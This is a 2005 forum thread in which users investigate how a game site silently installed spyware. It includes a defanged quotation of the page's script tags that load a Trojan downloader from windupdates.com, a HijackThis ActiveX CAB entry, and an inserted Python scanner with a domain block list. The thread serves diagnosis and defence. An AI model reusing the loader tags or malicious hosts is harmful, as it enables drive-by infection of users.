Auto-installing spyware

Discussion in 'other security issues & news' started by jsmsb, Jan 29, 2005.

Thread Status:
Not open for further replies.
  1. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    I was looking for a flash golf game I used to play a couple of years ago, when I ran across this site hxxp://www.gamesloth.com/games/miniputt.html . I have Norton Internet Security 2005 using current definitions and updates. I was also running adwatch (lavasoft) in the background, and have IE security pretty much globally set to ask permission on downloads and scripting. The site listed above pretty much ignores all settings and installs a crapload of nasty spyware. I'm wondering if this is a new vulnerability with IE or something that is a known issue. Thanks.
     
    Last edited by a moderator: Jan 29, 2005
  2. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    What did it install? I don't get a single thing installed.

    Cheers :D
     
  3. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    adv.exe, adx.exe, bargains.exe, exdl.exe, exul.exe, javexulm.vxd, mqexdlm.srg, plus a file named mmwork.exe, which installed and started running a few seconds after the page loaded. There was no other interaction from me other than opening the page. I know what type of spyware it is (bargain buddy), I just can't figure out how it installs without interaction from me.
     
  4. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,873
    Location:
    SW. Oklahoma
    I just have been playing golf there and it didn't try to install anything on my comp.

    bigc
     
  5. puff-m-d

    puff-m-d Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    4,451
    Location:
    North Carolina, USA
    Same here and I tried it on IE, FF, and Opera just to check.....
     
  6. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Welcome to Wilders Jsmsb.

    I use Process Guard 3 and it would warn me to anything trying to install, absolutely nothing. I would suggest a run through the comprehensive steps found in General Cleaning to confirm your system is clean.

    If these steps do not resolve your situation, you will need to download and run “Hijack This” found here and post your log at one of the forums found at A-SAP. The two bigger forums for HijackThis log processing, (meaning they process more log threads each day than most others) are: SpywareInfo.com and CastleCops.com. Be sure to read their posting policy in the links at their log review forum sections prior to posting.

    The steps mentioned in General Cleaning use software that ought to be part of your security, as an absolute minimum.

    Once your system is clean, you may want to take a look here for further discussion on security and how to make your system that much stronger and here for more.

    This is what works really well for me, very simple to use and maintain.

    Hope this helps...

    Let us know how you go.

    Cheers :D
     
  7. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    I am almost finished cleaning up after this infection.
    After I run my post cleanup scans, I am going to go back to that site, and then post logs for you guys to look at. I double checked my IE security settings, and although they are not at the highest settings, they aren't (in my opinion) set loosely by any measure. NIS 2005 only alerts me to a single executable (the one that runs within a few seconds of the page loading) which tries to connect to the internet. Thanks again for the help.
     
  8. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Well guys although you did not get anything installed on your comps, from the firefox adblock extension here you see that golf game site has more crap than you thought. For that site, it would be best to use firefox or some other alternative browser. Don't use IE for that golf gaming website.
     
    Last edited by a moderator: Jan 29, 2005
  9. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    If you use IE to access that site it's rather dangerous IMO. The spyware from that site must've got in via ActiveX. The best solution: Don't visit that site with IE. Use some other browser. Most spyware always gets in through IE.
     
  10. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    OK, this is going to be a long post, I just wanted everyone to see all the crap I found (no doubt there are other entries I'll find later on). A funny thing though; this last time I had a hell of a time getting the site to infect my computer. I had to clear all my temp files and cookies before it would reinfect me. Also, this time it didn't place as much stuff as the first time.

    ~~HiJack This log removed IAW Wilders policy Announcement~
    * The restriction on posting unsolicited HijackThis logs also applies to unsolicited ASviewer (Autostart Viewer), Spybot S&D and Ad-aware logs....Bubba~~
    Spybot S&D found one additional file:

    Roings: Library (File, nothing done)
    C:\WINDOWS\system32\objsafe.tlb

    Had to be removed at startup because it was memory resident.

    I am aware of radmin being installed. (I use it quite often).
     
    Last edited by a moderator: Jan 29, 2005
  11. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    But do you know that your system was actually clean to begin with?

    Three of the Moderators have been on this site, and none of us get infected either in IE or Firefox. I receive NO warnings whatsoever, and I have a very comprehensive list of security. Nod32 does NOT try to terminate the connection.

    I think your system is infected and needs to be cleaned. When clean I think you will be able to go back to that site without seeing any problems.

    Hope this helps...

    Cheers :D

    PS. I have left your Hijack This Log visible as it may help to get to the bottom of your problem.
     
  12. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    The logs posted were done AFTER I cleaned the first infection, and after doing full system scans with all of the tools listed, and all of them returned clean results. All cookies, temp files, usage tracks, registry streams, etc were also deleted.

    One more thing I forgot to mention... My first encounter with this site (and first infection) occurred using a fresh install of Windows XP inside of VMware Workstation, so I know for a fact it was not due to a previous infection.
     
  13. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    I am not a Spyware Expert, however this has been identified:

    These entries have been positively identified as malicious programs. In the HijackThis program, place a check mark next to the following entries.

    O16 - DPF: {15AD4789-CDB4-47E1-A9DA-992EE8E6BAD6} - //static.windupdates.com/cab/C.../Bridge-c81.cab
    (Description: Advertising delivery service.)
    I would leave that entry until we can receive further advice. I'll ask someone to check your log and that entry.

    Cheers :D
     
  14. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    https://www.wilderssecurity.com/showpost.php?p=357708&postcount=8

    Look and see if you can find any malware/spyware links/sites in my screenshot. ;)
    Some of the malware/spyware in that HJT log is related to some things in my screenshot.
     
  15. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    They are ALL related to that site :) . I can tell you that there is a single archive that downloads which contains three infected files. I suspect that this is happening because of an ActiveX control marked safe that shouldn't be.
     
  16. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    ActiveX again... most spyware exploits ActiveX to get in.
     
  17. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    When I click on the link (disabled above - //static.windupdates.com/cab/C.../Bridge-c81.cab) then I have a download window popup, and then problems arise, but not on the site itself with my setup.

    Are you running Service Pack 2?
     
  18. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    C'mon blackspear, look at the HJT log and you'll know if he's running SP1 or SP2. So obvious.
     
  19. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    LOL, sorry about that, it's getting late here, and I'm very tired, well that's my excuse and I'm sticking to it... ;) :D
     
  20. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    If you're tired take a break. Relax. :D
     
  21. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    As has been said on numerous occasions by those that rely on CERT, Secunia....etc....allowing script to run is how over 90% of IE vulnerabilities are exploited. That being said....if you allowed script to run on that site....the first 2 scripts it attempts to download are from a site....windupdates....a site that is listed in most all Restricted Site databases recommended by Security conscious individuals (as far as IE goes).

    http modified in below script to ht_p by me:
    Code:
    <!-- AUTO PROMPT START 
    <script language="javascript" type="text/javascript"
    src="ht_p://public.windupdates.com/prompt.php?
    h=aa29aa189967340a8288ed2b9057d2b19cabff24300f137829310ba2b4d3e837
    2ad81a8f5929e2b39999bc3b3755bbb82ac9204d48ab87d8705687b414&k=59e9
    e102e1f098ddb678773f518103ad"></script>
    <script language="javascript" type="text/javascript">self.focus();</script>
    AUTO PROMPT END -->
    <!-- AUTO PROMPT START -->
    <script language="javascript" type="text/javascript"
    src="ht_p://public.windupdates.com/prompt.php?
    =829f69c63722f2a7b90c050f4d6ce22d355a438cc6f510216d4ae2c23a266258a
    f20a226c67b2596506263c020608e61d768c01f8fab3cb614a1585c140ae4d13c1
    300b8d3ba528d0db8fa4ef7813aceeb&k=dc69d02639a84a58c1501951dabb54db
    ></script>
    <script language="javascript" type="text/javascript">self.focus();</script>
    <!-- AUTO PROMPT END -->
    
    The 2 above URL downloads from windupdates produce the 2 js files:
    • 59e9e102e1f098ddb678773f518103ad.js
    • dc69d02639a84a58c1501951dabb54db.js
      Status: INFECTED/MALWARE
      Kaspersky Anti-Virus Trojan-Downloader.JS.Small.af

    The above js files are just the start of how static.windupdates.com/cab/C.../Bridge-c81.cab attempts to install.
     
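A defender-side helper for the mechanism Bubba describes above and the O16 entry quoted earlier in the thread. This is an added example, not code from the thread or from any tool it mentions. It pulls the `src` of every remote `<script>` tag out of a page (separating tags that sit inside an HTML comment, as the first AUTO PROMPT block does, from live ones a browser would actually run), parses HijackThis O16/DPF lines, and flags any host on a Restricted Sites-style block list. The block list, the sample HTML, the `CONSTRUCTED-PATH` directory in the CAB URL and the second (benign) CLSID are constructed for the example; `windupdates.com`, the first CLSID and `Bridge-c81.cab` are taken from the thread.

```python
"""Flag remote scripts and ActiveX (O16/DPF) downloads that point at a
Restricted Sites-style block list. Added example; not code from the thread."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed block list. windupdates.com is the domain named in the thread;
# the second entry is a placeholder. Sub-domains of a listed domain match too.
RESTRICTED_DOMAINS = {"windupdates.com", "blocked-example.invalid"}


def host_is_restricted(url, blocklist=RESTRICTED_DOMAINS):
    """True if the URL's host equals, or is a sub-domain of, a listed domain.
    Handles scheme-less '//host/...' and 'ht_p://' defanged URLs as they
    appear in the quoted HijackThis line and in Bubba's post."""
    url = re.sub(r"^ht_p:", "http:", url.strip(), flags=re.I)  # undo defanging
    if url.startswith("//"):
        url = "http:" + url
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in blocklist)


class ScriptSrcCollector(HTMLParser):
    """Collects src= of live <script> tags; script tags found inside HTML
    comments are kept separately because a browser never executes them."""

    def __init__(self):
        super().__init__()
        self.live, self.commented = [], []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.live.append(src)

    def handle_comment(self, data):
        # A <script src=...> that only exists inside a comment is inert.
        self.commented += re.findall(
            r'<script[^>]*\ssrc\s*=\s*["\']([^"\']+)', data, flags=re.I)


def scan_html(html):
    """Return live/commented script sources that hit the block list."""
    p = ScriptSrcCollector()
    p.feed(html)
    p.close()
    return {
        "live_total": len(p.live),
        "live_restricted": [u for u in p.live if host_is_restricted(u)],
        "commented_restricted": [u for u in p.commented if host_is_restricted(u)],
    }


# HijackThis O16 format: O16 - DPF: {CLSID} (optional name) - URL
O16_RE = re.compile(
    r"^O16 - DPF: \{(?P<clsid>[0-9A-Fa-f-]{36})\}"
    r"(?: \((?P<name>[^)]*)\))? - (?P<url>\S+)")


def parse_o16(line):
    """Parse one HijackThis O16 line; None if the line is not an O16 entry."""
    m = O16_RE.match(line.strip())
    if not m:
        return None
    url = m.group("url")
    return {"clsid": m.group("clsid").upper(), "name": m.group("name"),
            "url": url, "cab": url.lower().endswith(".cab"),
            "restricted": host_is_restricted(url)}


# Constructed sample page mirroring the AUTO PROMPT layout from the thread:
# one block commented out, one live, plus an inline script and a local one.
SAMPLE_HTML = """<html><body>
<!-- AUTO PROMPT START
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/prompt.php?h=CONSTRUCTED1&k=CONSTRUCTED1"></script>
AUTO PROMPT END -->
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/prompt.php?h=CONSTRUCTED2&k=CONSTRUCTED2"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
<script src="/js/game.js"></script>
</body></html>"""

# Constructed O16 lines: the first reuses the CLSID and CAB name quoted in the
# thread with a placeholder directory; the second is a benign placeholder.
SAMPLE_O16_LINES = [
    "O16 - DPF: {15AD4789-CDB4-47E1-A9DA-992EE8E6BAD6} - "
    "//static.windupdates.com/cab/CONSTRUCTED-PATH/Bridge-c81.cab",
    "O16 - DPF: {00000000-0000-0000-0000-000000000001} (Constructed Benign "
    "Control) - http://downloads.example.com/ctl.cab",
    "O4 - HKLM\\..\\Run: [example] example.exe",
]

if __name__ == "__main__":
    print(scan_html(SAMPLE_HTML))
    for line in SAMPLE_O16_LINES:
        print(parse_o16(line))
```

The commented-out block is reported separately on purpose: a page author can flip it live with a one-character change, so a scan that only looks at executing scripts would miss that the block is staged. On the HijackThis side, the same host check that flags the `prompt.php` scripts flags the CAB download, which is why Bubba's point (the scripts are only the start of the CAB install) shows up as two findings on one domain.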
  22. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Thank you Bubba, my settings as well as the others were obviously too high for any effect to be seen. The HJT Log shows it though...

    Cheers :D
     
  23. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Hmmm, interesting... the spyware seems to get in via JavaScript.
     
  24. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    As was mentioned above....the majority of Secunia's advisories give a solution for IE vulnerabilities....disable Active script!
     
  25. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Disable active scripting and the problem is solved 100%.
     